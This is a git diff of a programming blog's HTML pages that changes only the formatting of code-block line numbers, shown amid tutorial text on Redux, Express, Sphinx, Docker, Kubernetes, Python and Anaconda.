diff --git a/actions-and-reducers-in-react-redux.html b/actions-and-reducers-in-react-redux.html index d770e23a..fa305712 100644 --- a/actions-and-reducers-in-react-redux.html +++ b/actions-and-reducers-in-react-redux.html @@ -162,14 +162,14 @@

Actions and Reducers in React-Redux

Redux State Diagram

Let's use react-redux to build a system which we can alert users when things trigger. For this we will need to build an action, a reducer and a component to display the alert.

To ensure that these three components are speaking the same language, we need to initialise types which will represent the states being passed around. These variables contain a string. For our alert system we need two variables

-
1
+
1
 2
export const SET_ALERT = "SET_ALERT"
 export const REMOVE_ALERT = "REMOVE_ALERT"
 

Action

We'll start by creating the action which will signify when an alert is triggered. We want all of our alerts to be unique so multiple alerts can handled without a problem which we will use uuid.

-
 1
+
 1
  2
  3
  4
@@ -212,7 +212,7 @@ 

Action

The action is declared as a function, which takes in 3 arguments (2 required): msg, alertType and timeout. Which we then use call the dispatch function with an object constructed from the arguments, and then after a specified timeout we dispatch another object to remove the same alert.

Note that we curry the dispatch function in this case, this is only possible from using the middleware redux-thunk, which can also be represented as:

-
1
+
1
 2
 3
 4
@@ -230,7 +230,7 @@ 

Component

This post won't go into detail around how to build a React component, which you can find over at another post: [INSERT REACT COMPONENT POST]

-
 1
+
 1
  2
  3
  4
@@ -278,7 +278,7 @@ 

Component

To break it down, we've created a React component (class) Alert which takes in alerts as an array, verifies it isn't null or empty, and finally iterates over each element in the alerts array to return a div stylized with the appropriate information.

Reducer

Lastly we have the reducer which we want to handle all the states that can be created by the alert action. Luckily we can do this with a switch statement:

-
 1
+
 1
  2
  3
  4
diff --git a/api-routes-in-nodejs.html b/api-routes-in-nodejs.html
index 05510c5b..298cdbc9 100644
--- a/api-routes-in-nodejs.html
+++ b/api-routes-in-nodejs.html
@@ -159,7 +159,7 @@ 

API Routes in Node.js

First off what's an API and more specifically what's an API route? API stands for Application Programming Interface, meaning it's how to communicate with the system you are creating. A route within an API is a specific path to take to get specific information or data out of. This post will dive into how to set up API routes in Nodejs with express.

We start by 'importing' express into our route and instantiating a router from the express library.

-
1
+
1
 2
const express = require('express');
 const router = express.Router();
 
@@ -204,7 +204,7 @@

API Routes in Node.js

These 4 methods make up the basic CRUD functionality (Create, Read, Update and Delete) of an application.

POST

Let's create a scaffold POST method in node.js.

-
1
+
1
 2
 3
router.post('/',function(req,res) {
     res.send('POST request to homepage');
@@ -212,7 +212,7 @@ 

POST

Similarly to do this asynchronously with arrow functions:

-
1
+
1
 2
 3
router.post('/',async(req,res) => {
     res.send('POST request to homepage');
@@ -220,7 +220,7 @@ 

POST

As we can see above, the first argument to our API route method is the path, and the following is the callback function (what should happen when this path is hit). The callback function can be a function, array of functions, series of functions (separated by commas), or a combination of all of them. This is useful if you are wanting to do validation before the final POST request is made. An example of this is:

-
1
+
1
 2
 3
router.post('/',[checkInputs()], async (req, res) => {
     res.send('POST request to homepage and inputs are valid');
@@ -229,7 +229,7 @@ 

POST

GET

All the methods within Express.js follow the same principles so to create a scaffold GET request:

-
1
+
1
 2
 3
router.get('/',async (req, res) => {
     res.send('GET request to homepage');
@@ -238,7 +238,7 @@ 

GET

PUT

Similarly:

-
1
+
1
 2
 3
router.put('/',async (req, res) => {
     res.send('PUT request to homepage');
@@ -247,7 +247,7 @@ 

PUT

DELETE

Similarly:

-
1
+
1
 2
 3
router.delete('/',async (req, res) => {
     res.send('PUT request to homepage');
@@ -279,7 +279,7 @@ 

Express Middleware

An example of using all of the arguments is:

-
1
+
1
 2
 3
 4
diff --git a/author/jack-mckew6.html b/author/jack-mckew6.html
index f32eb4c8..abdb8c56 100644
--- a/author/jack-mckew6.html
+++ b/author/jack-mckew6.html
@@ -335,7 +335,7 @@ 

Document code automatically through docstrings with Sphinx

This post goes into how to generate documentation for your python projects automatically with Sphinx!

First off we have to install sphinx into our virtual environment. Pending on your flavour, we can do any of the following

-
1
+
1
 2
 3
pip install sphinx …

diff --git a/automatically-generate-documentation-with-sphinx.html b/automatically-generate-documentation-with-sphinx.html index 637b590c..cb160a6d 100644 --- a/automatically-generate-documentation-with-sphinx.html +++ b/automatically-generate-documentation-with-sphinx.html @@ -160,7 +160,7 @@

Automatically Generate

Document code automatically through docstrings with Sphinx

This post goes into how to generate documentation for your python projects automatically with Sphinx!

First off we have to install sphinx into our virtual environment. Pending on your flavour, we can do any of the following

-
1
+
1
 2
 3
pip install sphinx
 conda install sphinx
@@ -168,13 +168,13 @@ 

Automatically Generate

Once you have installed sphinx, inside the project (let's use the directory of this blog post), we can create a docs folder in which all our documentation will live.

-
1
+
1
 2
mkdir docs
 cd docs
 

Ensuring to have our virtual environment with sphinx installed active, we run sphinx-quickstart, this tool allows us to populate some information for our documentation in a nice Q&A style.

-
 1
+
 1
  2
  3
  4
@@ -248,27 +248,27 @@ 

Automatically Generate

Now let's create an example package that we can write some documentation in.

-
1
+
1
 2
mkdir sphinxdemo
 cd sphinxdemo
 

Then we create 3 files inside our example package:

-
1
__init__.py
+
1
__init__.py
 
download -
1
version = "0.1.1"
+
1
version = "0.1.1"
 
-
1
__main__.py
+
1
__main__.py
 
download -
1
+
1
 2
 3
 4
@@ -282,12 +282,12 @@ 

Automatically Generate

-
1
file_functions.py
+
1
file_functions.py
 
download -
 1
+
 1
  2
  3
  4
@@ -330,12 +330,12 @@ 

Automatically Generate

We need to enable the napoleon sphinx extensions in docs/conf.py for this style to work.

The resulting documented code will look like:

-
1
__init__.py
+
1
__init__.py
 
download -
1
+
1
 2
 3
 4
@@ -349,12 +349,12 @@ 

Automatically Generate

-
1
__main__.py
+
1
__main__.py
 
download -
 1
+
 1
  2
  3
  4
@@ -380,12 +380,12 @@ 

Automatically Generate

-
1
file_functions.py
+
1
file_functions.py
 
download -
 1
+
 1
  2
  3
  4
@@ -451,7 +451,7 @@ 

Automatically Generate

Our conf.py file for sphinx's configuration results in:

Sphinx Configuration File conf.py download -
 1
+
 1
  2
  3
  4
@@ -574,7 +574,7 @@ 

Automatically Generate

We must also set our index.rst (restructured text) with what we want to see in our documentation.

Documentation Index File index.rst download -
 1
+
 1
  2
  3
  4
@@ -636,7 +636,7 @@ 

Automatically Generate

To generate individual pages for our modules, classes and functions, we define separate templates, these are detailed here: autosummary templates

Next we navigate our docs directory, and finally run:

-
1
make html
+
1
make html
 

This will generate all the stubs for our documentation and compile them into HTML format.

diff --git a/book-review-the-pragmatic-programmer.html b/book-review-the-pragmatic-programmer.html index d9f27c59..7f786aa2 100644 --- a/book-review-the-pragmatic-programmer.html +++ b/book-review-the-pragmatic-programmer.html @@ -217,7 +217,7 @@

Risk in Prototypes being Deployed

Crash Early

By crashing early, it means the program does a lot less damage than a crippled program. This concept can be implemented by checking for the inverse of the requirement and erroring. By doing this, it means the code is more readable in finding the requirements that it must meet. It captures more potential issues before they cause damage versus checking all the ducks are lined up.

For demonstrating this, we will use the example of a square root function. As we know, square root wants to have a positive number given to it (unless using complex numbers).

-
1
+
1
 2
 3
 4
diff --git a/category/python3.html b/category/python3.html
index 3422b053..df2da98c 100644
--- a/category/python3.html
+++ b/category/python3.html
@@ -324,7 +324,7 @@ 

Document code automatically through docstrings with Sphinx

This post goes into how to generate documentation for your python projects automatically with Sphinx!

First off we have to install sphinx into our virtual environment. Pending on your flavour, we can do any of the following

-
1
+
1
 2
 3
pip install sphinx …

diff --git a/category/software-development.html b/category/software-development.html index 6b1e324a..28f505e6 100644 --- a/category/software-development.html +++ b/category/software-development.html @@ -216,7 +216,7 @@

Document code automatically through docstrings with Sphinx

This post goes into how to generate documentation for your python projects automatically with Sphinx!

First off we have to install sphinx into our virtual environment. Pending on your flavour, we can do any of the following

-
1
+
1
 2
 3
pip install sphinx …

diff --git a/components-in-reactjs.html b/components-in-reactjs.html index baa2952e..43d245ff 100644 --- a/components-in-reactjs.html +++ b/components-in-reactjs.html @@ -166,7 +166,7 @@

Components in React.js

Let's create a file Landing.js (similarly could be named Landing.jsx for react specific file extension, Landing.ts for TypeScript or Landing.tsx for both react specific extension with TypeScript). This is followed by by importing all the necessary requirements for our javascript file.

Import Requirements

-
1
+
1
 2
 3
 4
import React from "react";
@@ -181,7 +181,7 @@ 

Import Requirements

PropTypes is a way of implementing runtime type checking for React props. If TypeScript is used for the project, this is somewhat extra type checking, which we can never have enough of!

The Component

Now that we've imported everything that we need, it's time to actually create the component! A component in React is a function, where the props are the inputs and the element to be rendered is the return statement. We do this with an arrow function (aka Lambda function) for clarity.

-
 1
+
 1
  2
  3
  4
@@ -239,7 +239,7 @@ 

Prop Types & Connect

This post is not intended to go through how to set up the redux store or interactions with it.

-
1
+
1
 2
 3
 4
@@ -254,7 +254,7 @@ 

Prop Types & Connect

Conclusion

Now we can use the statement import Landing from './Landing' and use our component similar to that of Link in our app!

The full source of Landing.js is:

-
 1
+
 1
  2
  3
  4
diff --git a/deploy-a-node-web-app-to-aws-elastic-beanstalk-with-docker.html b/deploy-a-node-web-app-to-aws-elastic-beanstalk-with-docker.html
index b1a47122..fb8dec70 100644
--- a/deploy-a-node-web-app-to-aws-elastic-beanstalk-with-docker.html
+++ b/deploy-a-node-web-app-to-aws-elastic-beanstalk-with-docker.html
@@ -179,7 +179,7 @@ 

GitHub Action

For the most part, we will be making use of run commands, as if we are interacting with the terminal in the runtime of ubuntu (Linux). Otherwise, we can make use of pre-made actions from the marketplace. One note to be made is that the AWS Elastic Beanstalk application has been set up to run specifically on Docker, and as such we need to upload the relevant Dockerfile (production) along with any assets.

The contents of the Github Action in whole will be:

-
 1
+
 1
  2
  3
  4
diff --git a/deploying-with-kubernetes.html b/deploying-with-kubernetes.html
index c535ffc7..a8b520ef 100644
--- a/deploying-with-kubernetes.html
+++ b/deploying-with-kubernetes.html
@@ -272,7 +272,7 @@ 

CI/CD

Setting up Ingress-Nginx

Before we can access our application through an IP or web address, we need to set up ingress-nginx, similar to how we did with docker-compose in previous posts. Luckily, we can make use of helm to add this functionality for us (provided we'd set up nginx configuration like we already have). This can be done by sshing into the terminal of our Kubernetes cluster, or similarly making use of the Cloud Shell provided by Google Cloud.

Firstly which we need to install helm (https://helm.sh/docs/intro/install/#from-script):

-
1
+
1
 2
 3
curl -fsSL -o get_helm.sh https://raw.githubusercontent.com/helm/helm/master/scripts/get-helm-3
 chmod 700 get_helm.sh
@@ -280,7 +280,7 @@ 

Setting up Ingress-Nginx

Followed by setting up ingress-nginx (https://kubernetes.github.io/ingress-nginx/deploy/#using-helm):

-
1
+
1
 2
helm repo add ingress-nginx https://kubernetes.github.io/ingress-nginx
 helm install my-release ingress-nginx/ingress-nginx
 
diff --git a/develop-and-deploy-multi-container-applications.html b/develop-and-deploy-multi-container-applications.html index 2044a460..72baebfe 100644 --- a/develop-and-deploy-multi-container-applications.html +++ b/develop-and-deploy-multi-container-applications.html @@ -223,7 +223,7 @@

Vue

FibInputForm Component

Components are pieces of user interface that we can access in multiple parts of our application, we build a component which will contain both the HTML and javascript for driving the user input, and for displaying the output retrieved from Redis or PostgreSQL. Vue components are typically comprised of a template block and a corresponding script and style block. When writing the template for a component, there is numerous Vue specific attributes that we can provide the elements in the HTML. For this project we will make use of Bulma/Buefy CSS (which can be installed with npm install bulma or npm install buefy) for our styling.

We create a file named FibInputForm.vue inside project_name/src/components with the contents:

-
 1
+
 1
  2
  3
  4
@@ -379,7 +379,7 @@ 

FibInputForm Component

To briefly cover the functionality above, the template is built up of 3 parts, the input form where users submit an index to query, a list of the latest indexes as stored in Redis separated by a comma and finally a list of the calculated as retrieved from the PostgreSQL database. We use axios to interface we the API that we will create with express. We query the API upon load, and the page is always reloaded when submit is pressed. Now that this has been exported, it can be imported from any other point in our web application and placed in with a <FibInputForm/> element! Neat!

FibInputPage View

Now that we have our component, we need a page to put it on! We create a new file within project_name/src/views named FibInputPage.vue with the contents:

-
 1
+
 1
  2
  3
  4
@@ -429,7 +429,7 @@ 

FibInputPage View

As we can see above, we've imported our neat little FibInputForm and used it after placing it in a centered section. Again we export the page view so we can import into the router to make sure it's linked to a URL.

Routing the Page

Lastly for Vue, we need to set up a route so users can reach our page, both within the vue-router and on the main page (App.vue). Routes are all defined within project_name/router/index.ts. So we need to add in a new one for our FibInputPage by adding the following object into the routes array:

-
1
+
1
 2
 3
 4
@@ -449,7 +449,7 @@ 

Routing the Page

Next to ensure the route is accessible from a link on the page, add a router-link element into the template of App.vue:

-
1
<router-link to="/fib">Fib</router-link> |
+
1
<router-link to="/fib">Fib</router-link> |
 

Redis

@@ -457,7 +457,7 @@

Redis

Redis is an open source, in-memory data store, we give it a key and a value, which it'll store. Later we can ask with the key, and get the value back. We are going to set up two parts to make this service work as expected. The redis runtime is managed for us directly from using the redis image as provided on Docker Hub, but we need to make a node.js project to interface with it.

We do this by creating 3 files: package.json, index.js and keys.js. package.json defines what dependencies need to be installed, and how to run the project. index.js manages the redis client and contains the functionality for calculating the fibonacci sequence when given an index. keys.js contains any environment variables that the project may need. In particular we use environment variables so docker-compose can link all the services together later on.

Here is the code for the core of this project, index.js:

-
 1
+
 1
  2
  3
  4
@@ -504,7 +504,7 @@ 

Redis

PostgreSQL

Find all the source code for the PostgreSQL service at: https://github.com/JackMcKew/multi-docker/tree/master/server

We are going to use the PostgreSQL service part of our project to contain the interface with the database, and the API with express. Very similar to our redis project, we need a package.json, index.js and keys.js. Let's dive straight into the code inside index.js:

-
 1
+
 1
  2
  3
  4
@@ -691,7 +691,7 @@ 

PostgreSQL

Nginx

Nginx in this project helps us create all the connections between the services and for them all to play nicely. How nginx works is by defining any connections in a configuration file, and pass that configuration file upon runtime.

This is our default.conf nginx configuration for this project:

-
 1
+
 1
  2
  3
  4
@@ -741,7 +741,7 @@ 

Nginx

We also set up a few locations, these help nginx 'finish' the route. / means any incoming connection, pass it off to the front end to render. If any request connection comes in containing /api then we want to pass that request to the service, so we rewrite the URL to be the correct URL.

Docker Compose

Now that we've got our individual services all configured, we need a way to run them all at the same time. We need to create a docker-compose.yml which will contain all the environment variables, and how each service depend/connect to each other so we can run it all!

-
 1
+
 1
  2
  3
  4
@@ -876,7 +876,7 @@ 

Docker Compose

Note that our environment variables (which were set in keys.js earlier), are just the name of the service given in the docker-compose.yml file. Docker Compose handles all the renaming when each service is connected up for us! How awesome is that!

Github Actions

Now that we've set all of services and make sure they place nice in Docker Compose, it's time to implement CI/CD with Github Actions so whenever we push new versions of our code, it'll automatically test that everything works and deploy our new version of the application. We do this by creating a test-and-deploy.yml within .github/workflows/ which contains:

-
 1
+
 1
  2
  3
  4
@@ -1036,7 +1036,7 @@ 

Docker Hub

Everything's now set up! For another user or a deployment service to get each of the images for the services they've created they can now simply run docker run jackmckew/multi-docker-client and that's it! It should run on any operating system provided Docker is installed, how cool is that!

Deploying to AWS Elastic Beanstalk

Now we want to deploy this application to Elastic Beanstalk, that means we need to create a Dockerrun.aws.json which is very similar to that of the docker-compose.yml. The contents of the json file will be:

-
 1
+
 1
  2
  3
  4
diff --git a/develop-and-deploy-with-docker.html b/develop-and-deploy-with-docker.html
index 9ef8088a..999c796d 100644
--- a/develop-and-deploy-with-docker.html
+++ b/develop-and-deploy-with-docker.html
@@ -181,7 +181,7 @@ 

Develop and Deploy with Docker

The Web Application

For the web app we will use React, which is a javascript framework for managing the front end of applications. To generate the web app boilerplate for us, we will use create-react-app. For running this, ensure that Node.js is installed on the local PC. Finally run the command below, to initialise the front end component of React of our web app.

-
1
npx create-react-app frontend --template typescript
+
1
npx create-react-app frontend --template typescript
 
@@ -190,7 +190,7 @@

The Web Application

Dockerfile

For this workflow we're going to set up two Dockerfiles, one for developing and one for production. Let's start with the developers Dockerfile, which we will aptly name Dockerfile.dev, we must ensure to add the -f flag along with the filename when building the Docker image with docker build -f Dockerfile.dev ..

The contents of our Dockerfile.dev will contain:

-
 1
+
 1
  2
  3
  4
@@ -220,16 +220,16 @@ 

Dockerfile

To circumvent the issue in that Docker typically takes snapshots of the code and we want our app to update on save, we use mount to create a 'reference' to our folder on the local PC. We do this by running the command:

-
1
docker run -it -p 8000:3000 -v /app/node_modules -v ${pwd}:/app [image_id]
+
1
docker run -it -p 8000:3000 -v /app/node_modules -v ${pwd}:/app [image_id]
 

If using Windows, replace the ${pwd} with the full path to the folder, ensuring to swap all backslashes to forwards slashes and changing C: to /C/. Here is an example:

-
1
docker run -it -p 8000:3000 -v /app/node_modules -v /C/Users/jackm/Documents/GitHub/docker-kubernetes-course/frontend:/app [image_id]
+
1
docker run -it -p 8000:3000 -v /app/node_modules -v /C/Users/jackm/Documents/GitHub/docker-kubernetes-course/frontend:/app [image_id]
 

Docker Compose

Rather than using the rather large command above, let's use Docker Compose.

-
 1
+
 1
  2
  3
  4
@@ -263,7 +263,7 @@ 

Docker Compose

  • We mount the current directory to the app directory in the container for updating in sync
  • Again, if using Windows, we need to add some more options to our service:

    -
    1
    +
    1
     2
     3
     4
    stdin_open: true
    @@ -280,7 +280,7 @@ 

    Running Tests

    Option 1 can be cumbersome as we will need to do this each time when running a container.

    Option 2 is achieved by creating a new service in our docker-compose.yml file:

    -
     1
    +
     1
      2
      3
      4
    @@ -327,7 +327,7 @@ 

    Nginx

    Multi-stage Dockerfile

    To implement our multi-stage Dockerfile as above we do this we the following yaml:

    -
     1
    +
     1
      2
      3
      4
    diff --git a/developing-with-kubernetes.html b/developing-with-kubernetes.html
    index d2bf2b62..0e1346d9 100644
    --- a/developing-with-kubernetes.html
    +++ b/developing-with-kubernetes.html
    @@ -232,7 +232,7 @@ 

    The Architecture

    ClusterIP Service

    We need to set up a ClusterIP service for each of our deployments except the worker deployment. This will allow our services to communicate with others inside the node.

    To do this, we create a configuration yaml file:

    -
     1
    +
     1
      2
      3
      4
    @@ -289,7 +289,7 @@ 

    PVC Configuration

    -
     1
    +
     1
      2
      3
      4
    @@ -318,7 +318,7 @@ 

    PVC Configuration

    Environment Variables

    Some of our pods depend on environment variables being set to work correctly (eg, REDIS_HOST, PGUSER, etc). We add using the env key to our spec > containers configuration.

    For example, for our worker to connect to the redis deployment:

    -
    1
    +
    1
     2
     3
     4
    @@ -340,7 +340,7 @@ 

    Environment Variables

    Note that for the value of the REDIS_HOST we are stating the name of the ClusterIP service we had previously set up. Kubernetes will automatically resolve this for us to be the correct IP, how neat!

    Secrets

    Secrets are another type of object inside of Kubernetes that are used to store sensitive information we don't want to live in the plain text of the configuration files. We do this through a kubectl commad:

    -
    1
    kubectl create secret [secret_type] [secret_name] --from-literal key=value
    +
    1
    kubectl create secret [secret_type] [secret_name] --from-literal key=value
     

    There are 3 types of secret types, generic, docker_registry and tls, most of the time we'll be making use of the generic secret type. Similar to how we consume other services, we will be consuming the secret from the secret_name parameter. The names (but not the value) can always be retrieved through kubectl get secrets.

    @@ -349,7 +349,7 @@

    Secrets

    Consuming Secrets as Environment Variable

    Consuming a secret as an environment variable for a container is a little different to other environment variables. As secrets can contain multiple key value pairs, we need to specify the secret and the key to retrieve the value from:

    -
    1
    +
    1
     2
     3
     4
    @@ -363,7 +363,7 @@ 

    Consuming Secrets as Environm

    Ingress Service

    The ingress service allows us to connect to other Kubernetes cluster from outside, and thus maintains how we should treat incoming requests and how to route them.

    The entirety of our configuration for the ingress service is:

    -
     1
    +
     1
      2
      3
      4
    diff --git a/distributing-python-code.html b/distributing-python-code.html
    index 5abb0777..3f634628 100644
    --- a/distributing-python-code.html
    +++ b/distributing-python-code.html
    @@ -161,7 +161,7 @@ 

    Distributing Python Code

    This post will cover a way of distributing Python code such that is can be used by someone that does not have Python installed. One of the major drawbacks with Python that the gap is slowly being closed is how easy it is to distribute Python code.

    At a minimum, the computer that is to run the code must have the Python compiler (or equivalent). Now while this has been progressively included in more operating systems as a default (May update of Windows being the latest), you must still develop as such that is not present on the users' PC.

    For this post, I will show you a basic piece of code to demonstrate how it will be packaged and distributed to your users. To show a basic dialog box on the screen with the following code:

    -
    1
    +
    1
     2
     3
    import ctypes
     
    diff --git a/dunders-in-python.html b/dunders-in-python.html
    index 34fdcd5c..56f49758 100644
    --- a/dunders-in-python.html
    +++ b/dunders-in-python.html
    @@ -159,7 +159,7 @@ 

    Dunders in Python

    A 'dunder' (double underscores) in Python (also known as a magic method) are the functions within classes having two prefix and suffix underscores in the function name. These are normally used for operator overloading (eg, __init__, __add__, __len__, __repr__, etc). For this post we will build a customized class for vectors to understand how the magic methods can be used to make life easier.

    First of all before we get into the magic methods, let's talk about normal methods. A method in Python is a function that resides in a class. To begin with our Vector class, we initialise our class and give it a function, for example:

    -
    1
    +
    1
     2
     3
     4
    class Vector():
    @@ -169,15 +169,15 @@ 

    Dunders in Python

    Now to call the method, we simply call the function name along with the Vector instance we wish to use:

    -
    1
    Vector.say_hello()
    +
    1
    Vector.say_hello()
     

    This will print:

    -
    1
    Hello! I'm a method
    +
    1
    Hello! I'm a method
     

    Now for our vector class, we want to be able to initialise it with certain constants or variables for both the magnitude and direction of our vector. We use the __init__ magic method for this, as it is invoked without any call, when an instance of a class is created.

    -
    1
    +
    1
     2
     3
    class Vector():
         def __init__(self, *args):
    @@ -185,7 +185,7 @@ 

    Dunders in Python

    Now when we create an instance of our Vector class, we can give it certain values that it will store in a tuple:

    -
    1
    +
    1
     2
     3
    vector_1 = Vector(1,2,3)
     
    @@ -193,11 +193,11 @@ 

    Dunders in Python

    Which will print:

    -
    1
    <__main__.Vector object at 0x03E90530>
    +
    1
    <__main__.Vector object at 0x03E90530>
     

    But to us humans, this doesn't mean much more than we know what the name of the class is of that instance. What we really want to see when we call print on our class is the values inside it. To do this we use the __repr__ magic method:

    -
    1
    +
    1
     2
     3
     4
    @@ -217,11 +217,11 @@ 

    Dunders in Python

    Which will print:

    -
    1
    (1, 2, 3)
    +
    1
    (1, 2, 3)
     

    This is exactly what we want! Now what if we wanted to create a Vector, but we weren't sure what values we wanted to give it yet. What would happen if we didn't give it any values? Would it default to (0,0) like we would hope?

    -
    1
    +
    1
     2
     3
    empty_vector = Vector()
     
    @@ -229,11 +229,11 @@ 

    Dunders in Python

    Which will print:

    -
    1
    ()
    +
    1
    ()
     

    Not exactly how we need it, so we would need to run a check when the class is being initialized, to ensure that there are values being provided:

    -
    1
    +
    1
     2
     3
     4
    @@ -252,7 +252,7 @@ 

    Dunders in Python

    Which when initialise an empty instance of our Vector now, it will create a (0,0) vector for us!

    Now what if we wanted to be able to check how many values were inside our vector class? To do this we can use the __len__ magic method>:

    -
     1
    +
     1
      2
      3
      4
    @@ -284,7 +284,7 @@ 

    Dunders in Python

    Which will print:

    -
    1
    +
    1
     2
    (1, 2, 3)
     3
     
    diff --git a/efficient-frontier-for-balancing-portfolios.html b/efficient-frontier-for-balancing-portfolios.html index 3e46fb8d..86671302 100644 --- a/efficient-frontier-for-balancing-portfolios.html +++ b/efficient-frontier-for-balancing-portfolios.html @@ -180,7 +180,7 @@

    Efficient Frontier for Bala
  • The result from the minimize function is returned as a OptimizeResult type.
  • -
     1
    +
     1
      2
      3
      4
    @@ -206,7 +206,7 @@ 

    Efficient Frontier for Bala

    Similarly to the maximum sharpe ratio we do the same for determining the minimum volatility portfolio programmatically. We minimise volatility by trying different weightings on our asset allocations to find the minima.

    -
     1
    +
     1
      2
      3
      4
    @@ -234,7 +234,7 @@ 

    Efficient Frontier for Bala

    As above, we can also draw a line which depicts the efficient frontier for the portfolios for a given risk rate. Below some functions are defined for computing the efficient frontier. The first function, efficient_return is calculating the most efficient portfolio for a given target return, and the second function efficient frontier is compiling the most efficient portfolio for a range of targets.

    -
     1
    +
     1
      2
      3
      4
    @@ -274,7 +274,7 @@ 

    Efficient Frontier for Bala

    Now it's time to plot the efficient frontier on the graph with the randomly selected portfolios to check if they have been calculated correctly. It is also an opportune time to check if the maximum Sharpe ratio and minimum volatility portfolios have been calculated correctly by comparing them to the previously randomly determined portfolios.

    -
     1
    +
     1
      2
      3
      4
    @@ -387,7 +387,7 @@ 

    Efficient Frontier for Bala

    Code_R2bA54PriC

    The surprising part is that the calculated result is very close to what we have previously simulated by picking from randomly generated portfolios. The slight differences in allocations between the simulated vs calculated are in most cases less than 1%, which shows how powerful randomly estimating calculations can be albeit sometimes not reliable in small sample spaces.

    Rather than plotting every randomly generated portfolio, we can plot the individual stocks on the plot with the corresponding values of each stock's return and risk. This way we can compare how diversification is lowering the risk by optimizing the allocations.

    -
     1
    +
     1
      2
      3
      4
    diff --git a/episode-11-power-quality-explained.html b/episode-11-power-quality-explained.html
    index f8239c0c..35d08821 100644
    --- a/episode-11-power-quality-explained.html
    +++ b/episode-11-power-quality-explained.html
    @@ -170,7 +170,7 @@ 

    Episode 11 - Power Quality Explained

    Harmonics

    AC (Alternating Current) electricity is generated as a sinusoidal waveform, and harmonics are signals/waves whose frequency is a whole number multiple of the frequency of the reference signal/wave. To visualize this phenomenon, we can use packages like NumPy and Matplotlib, to calculate and plot our base signal and it's harmonics (I encourage you to run this code and change the harmonics to see what they look like).

    -
     1
    +
     1
      2
      3
      4
    @@ -240,7 +240,7 @@ 

    Capacitor Calculator - Python

    CodeCogsEqn-6.gif

    CodeCogsEqn-7.gif

    Once we input all these required formulas, and our initial data points, we are now able to easily compute the required size of capacitor to amend power factor issues.

    -
     1
    +
     1
      2
      3
      4
    diff --git a/episode-13-types-of-machine-learning.html b/episode-13-types-of-machine-learning.html
    index dbc132ca..97415ecc 100644
    --- a/episode-13-types-of-machine-learning.html
    +++ b/episode-13-types-of-machine-learning.html
    @@ -167,7 +167,7 @@ 

    Episode 14 - Types of Machine Lear

    Supervised Learning

    Most practical machine learning algorithms use supervised learning. Supervised learning is where you have one or more input variables (x) and output variable(s) (y), and you use an algorithm to learn the mapping function from the input to the output.

    -
    1
    y = f(x)
    +
    1
    y = f(x)
     

    The end goal of this algorithm is to approximate the mapping function accurately such that then you have a new data input (x), you can predict what the result (y) for that data would be.

    diff --git a/episode-5-android-multi-touch.html b/episode-5-android-multi-touch.html index 558aee95..8f599173 100644 --- a/episode-5-android-multi-touch.html +++ b/episode-5-android-multi-touch.html @@ -159,7 +159,7 @@

    Episode 5 - Android Multi-Touch

    This week's episode of Code Fridays will go into detail on how to handle multi-touch inputs within Android. Firstly to handle the location on where the screen in being touched we need to create a class to handle the interaction. By creating a public class like Finger.java as can be seen below it contains 3 values: x_pos, y_pos and id. It is also useful to create a constructor so that other classes can easily construct the Finger class.

    ezgif.com-video-to-gif-2

    -
     1
    +
     1
      2
      3
      4
    @@ -189,7 +189,7 @@ 

    Episode 5 - Android Multi-Touch

    Now that we have a class to store our details on how each finger is touching the screen, we now need to interact with some base level Java. Firstly we need to extend a view within the Android application so that the application knows what boundaries to deal, in my test application, I've just used the entire screen as a view.

    After that an array is needed to store the data of multiple inputs touching the screen. I've used a TreeMap in this example as this allows for ease later on so that they are in order on how they were input, however this comes with a downside to this example as lifting a input in the middle of the order touched crashes the array, this will be fixed in a later episode.

    A paint is initialized for both the stroke paint for drawing lines between the touches and a paint for the text that is to come. Generic constructors for the view are also listed below.

    -
     1
    +
     1
      2
      3
      4
    @@ -255,7 +255,7 @@ 

    Episode 5 - Android Multi-Touch

    Now that everything is initialized and ready to draw some graphics on the screen so that the application is interactive, now we have to interface with touch events. This is done by creating a new function within our View class, that takes in a MotionEvent on the View so that we can detect different types of touch events. Documentation on this can be found (https://developer.android.com/training/graphics/opengl/touch#java).

    -
     1
    +
     1
      2
      3
      4
    @@ -366,7 +366,7 @@ 

    Episode 5 - Android Multi-Touch

    Now that we've created a new Finger class inside our TreeMap by the order that the screen is touched in and we're removing that class when the screen input has been released, we are now ready to draw on the screen from our inputs.

    By iterating through the TreeMap, in each loop we know what the previous and what the next value in the array we can draw a circle for where the input is and a line between. This also allows us to determine whereabouts is the point in between these two points so we can write text. For this example, I've chosen to write the length of the distance between the two inputs to demonstrate that this can also be dynamic in nature.

    -
     1
    +
     1
      2
      3
      4
    diff --git a/episode-8-anaconda.html b/episode-8-anaconda.html
    index 12e2eb88..66fc5f47 100644
    --- a/episode-8-anaconda.html
    +++ b/episode-8-anaconda.html
    @@ -159,19 +159,19 @@ 

    Episode 8 - Anaconda

    Python is one of my favourite languages to develop in (if you haven't noticed yet). My favourite feature of Python is how easy it is to share your work with others and integrate other's code into your own projects. However as a project grows and gets older as time goes on it can be cumbersome to keep track of hundreds of dependencies that your project relies on to work. Even more so when all of these package dependencies are also being updated and changing functionality.

    One elegant solution that I always use when first starting a new project is to use Anaconda (https://www.anaconda.com/). Anaconda is a free, easy-to-install package and environment manager for Python. It is very simple to use in that when you are starting a new project, you just need to create a new environment (within the Anaconda navigator) with the python version you wish to use and then activate it. Simple as that.

    -
    1
    conda create --name new_environment_name python=3.5
    +
    1
    conda create --name new_environment_name python=3.5
     

    In one single line, we have just created a new environment named "new_environment_name" and specified that this environment will use Python version 3.5. Now to activate the environment it is as simple as typing "activate new_environment_name".

    -
    1
    activate new_environment_name
    +
    1
    activate new_environment_name
     

    Now to see what packages are contained within our newly created environment, or to ever see what packages and their versions are listed the command is:

    -
    1
    conda list
    +
    1
    conda list
     

    Now that we have created, activated and peeked inside our newly created environment we need to add some packages that we might use! This is as simple as the command "conda install PACKAGENAME", for example we might want to install matplotlib, a widely used data visualization package. Installing matplotlib into our environment is done by the command:

    -
    1
    conda install matplotlib
    +
    1
    conda install matplotlib
     

    You will note that when this runs, it also asks to install all the dependencies that matplotlib relies on and will also notify you later when you have more packages that some might clash and need to be upgraded/downgraded so that all packages have a common version to work with.

    @@ -214,11 +214,11 @@

    Episode 8 - Anaconda

    By following these simple constraint rules, it is very easy to manage package version to maintain dependencies within your project without tearing your hair out when packages update and break your project.

    Another major benefit of using Anaconda to manage your project's package dependencies is that when you're developing simultaneously with other projects and you may discover some bugs and wish to share them with your colleagues. To share all the dependencies (and their respective versions) with your colleague is as easy as generating an "environment file" and sharing the file with them so they have exactly the same environment as you. This is done by the following command:

    -
    1
    conda env export > environment.yml
    +
    1
